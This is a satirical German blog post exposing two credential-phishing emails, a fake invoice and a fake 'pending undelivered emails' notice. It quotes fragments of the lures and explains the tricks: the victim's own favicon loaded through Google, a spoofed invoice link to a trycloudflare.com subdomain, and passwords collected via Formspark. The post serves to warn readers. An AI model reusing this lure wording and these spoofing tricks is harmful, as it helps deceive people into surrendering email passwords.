Oh, wie geil. Eine sekundengenaue Fristsetzung hatte ich auch noch nie. Darüber übersehe ich sogar, dass das US-amerikanische Datumsformat für gestern – die Mail ist übrigens heute angekommen – hier ein kleines bisschen unüblich ist. Aber wofür bezahle ich da eigentlich, und welche Dienstleistung wird storniert? Ich weiß ja nicht einmal, wer mir hier angeblich schreibt. Moment, ich schaue mal in den HTML-Quelltext, da sollte ja oben noch ein Logo nachgeladen werden, das schafft bestimmt Klarheit:

<img style="padding: 20px; max-width: 64px;" alt=" Logo" src="https://www.google.com/s2/favicons?sz=64&amp;domain=tamagothi.de" width="64" height="64">

Oh krass, das ist das Piktogramm meiner eigenen Homepage! Gut, dass Google immer so vielfältig nutzbar ist und dass Google jeder Missbrauch durch Kriminelle seit mindestens anderthalb Jahrzehnten völlig wumpe ist. Zuverlässigkeit und vielseitige persönliche Nutzbarkeit ist eben das Wichtigste im gegenseitigen Umgang zwischen asozialen Unternehmen wie Google und Trickbetrügern. 😅️

(Ja, werter Mitmensch Jurist, ich habe „asozial“ geschrieben. Es ist meine Bezeichnung für Geschäftsmodelle, die darauf basieren, dass ein börsennotiertes Unternehmen Reibach mit kostenlosen Dienstleistungen macht, aber die anfallenden Aufwände und Kosten durch den Missbrauch dieser Dienstleistungen der gesamten restlichen Menschheit aufbürdet. Google ist selbst Spam. Verantwortungslos und geradezu kriminell geschäftstüchtig. Schon sehr, sehr lange. Google stinkt.)

Wer eine sicher konfigurierte Mailsoftware verwendet, die nicht einfach Bilder aus dem Web nachlädt, kann nicht so leicht mit billigen Tricks in die Irre geführt werden. Wer aber seine technische Bildung aus „Mein Auto spricht zu mir“ Knight Rider bezogen hat, wird von „meine Website mailt mich an“ auch nicht weiter überrascht sein. 😆️

You can log in to your client area to view and pay the invoice at:
https://www.tamagothi.de/viewinvoice.php?id=INV–2147483648

Natürlich ist der Link irreführend. Er geht nicht in die Domain tamagothi.de, das ist nur der Linktext. In Wirklichkeit geht es in eine Subdomain von trycloudflare.com Das kostet den Phisher ja auch nichts. Dort bekommt man die Möglichkeit…

Your session has expired, please sign in to continue

…etwas sehr dummes zu tun und auf einer ansonsten völlig nackten Webseite ohne Impressum sein Passwort einzugeben. Dieses geht direkt an Kriminelle. Mit einem Zugriff auf die E-Mail kann man bei den meisten Menschen schon viel anfangen. Man kann Konten bei Amazon oder eBay übernehmen und für Betrugsgeschäfte unter fremder Identität nutzen, man kann aber auch personalisierte Betrugsnummern machen – nicht vergessen: der gesamte bisherige Mailverkehr steht den Betrügern zur Verfügung, und der gibt tiefe Einblicke – und Freunde, Bekannte, Verwandte anschreiben, eine Notlage vorspielen und um Geld bitten, am besten über Western Union, das geht ja am schnellsten.

Wenn man sich angemeldet hat, gibt es eine plumpe Fehlermeldung. Die Daten sind aber schon bei den Trickbetrügern. Um die Daten zu erhalten, verwenden sie die Dienstleistung von Formspark, wo man sich unter Angabe seiner Mailadresse ebenfalls einen kostenlosen Account einrichten kann.

Thank you for using our services,
Visit our website | Log in to your account | Get support

Copyright © All rights reserved.

Vielen Dank, dass ihr Spammer mir so gern den Arsch sauberleckt! 👍️
Klick mal hier | Klick mal dort | Hauptsache, du klickst, denn alle Links führen auf die gleiche Phishing-Seite

Die Unternehmung mit der Firmierung „Alle Rechte vorbehalten“ proklamiert ein grundloses und immerwährendes geistiges Eigentum auf diesen Blogeintrag eines Spamgenießers.

Entf! 🚽️

ATTTENTION! : Retrieve Pending Undelivered Emails To Your Inbox

Freitag, 19. September 2025

Abt.: Gib mir grundlos dein Mailpasswort!

Von: Restoredesk.tamagothi.de <Info@mail.nstc.in>

Ja nee, ist klar! Die Domain tamagothi.de wird also von irgendeiner obskuren Institution mit der Domain nstc.in verwaltet. Das wüsste ich aber! Viele Grüße nach Indien. 🤭️

Postmaster tamagothi.de Recipient: planning

We‘re reaching out to let you know that we were unable to deliver some message(s) to your email address due to security restrictions on your mail server.

It appears that your system settings is currently blocking incoming messages.

Account Information:

Email Address: nac███████ter@tamagothi.de

Status: Held

Allow Message Review Message
© 2025. All Rights Reserved.

Mit proklamiertem geistigen Eigentum der tollen Klitsche „Alle Rechte vorbehalten“. Oder firmiert das Unternehmen vielleicht als 2025? Das wäre doch eine tolle Zahl, die man auf elf verschiedene Weisen als Summe dreier Quadratzahlen schreiben kann und in deren Primfaktorzerlegung nur die Primzahlen 3 und 5 vorkommen. Die Links gehen übrigens in eine Subdomain von trycloudflare.com. Kostet die Phisher ja nix.

Cloudflare hat den kriminellen Müll schon entfernt. Danke! Es wird ein vermutlich ein ganz ordinäres Phishing auf Mailpasswörter gewesen sein. Verbrecher treten ja viel lieber unter anderer Identität auf, wenn sie ihre Verbrechen begehen, denn sie tragen nicht so gern Handschelle.

(Wenn man mir eine Mail nicht angenommen wird, hat das übrigens immer einen Grund. Die meisten dieser Gründe konfiguriere ich von Hand. Wer mich über Mail erreichen möchte, sollte vielleicht nicht spammen.)